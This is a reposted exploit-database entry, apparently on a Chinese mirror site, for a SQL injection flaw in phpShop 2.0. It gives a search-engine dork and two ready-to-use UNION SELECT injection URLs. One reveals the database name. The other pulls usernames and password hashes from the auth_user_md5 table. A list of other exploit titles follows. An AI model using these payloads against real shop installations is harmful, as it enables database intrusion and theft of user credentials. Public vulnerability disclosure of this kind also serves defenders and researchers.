phpShop 2.0 – SQL Injection

Exploit Database
12 阅读

作者： By onestree

日期： 2013-01-14
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/24108/

# Exploit Title : phpshop 2.0 SQL Injection Vulnerability
# Author: By onestree
# Software Link : http://code.google.com/p/phpshop/downloads/list
# tested: windows 7 / ubuntu
# Dork: inurl:"tanyakan pada rumput yang bergoyang"

SQLi p0c:
 
==================

http://localhost/phpshop 2.0/?page=admin/function_list&module_id=11'
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 -- 

http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--




Thanks : 

Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
 
indonesiancoder - moeslimh4x0r - go-coder

last Exploits
phpShop 2.0 – SQL Injection的更多信息

Web Wiz Forums 9.68 – SQL Injection：
Oracle PeopleSoft – ‘PeopleSoftServiceListeningConnector’ XML External Entity via DOCTYPE：
WordPress Plugin Duplicator 1.4.7 – Information Disclosure：
PHPJabbers Job Listing Script – Multiple Vulnerabilities：
Directory Management System 1.0 – SQL Injection Authentication Bypass：
Micro Focus Secure Messaging Gateway (SMG) < 471 - Remote Code Execution (Metasploit)：
BoastMachine 3.1 – ‘key’ Cross-Site Scripting：
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution：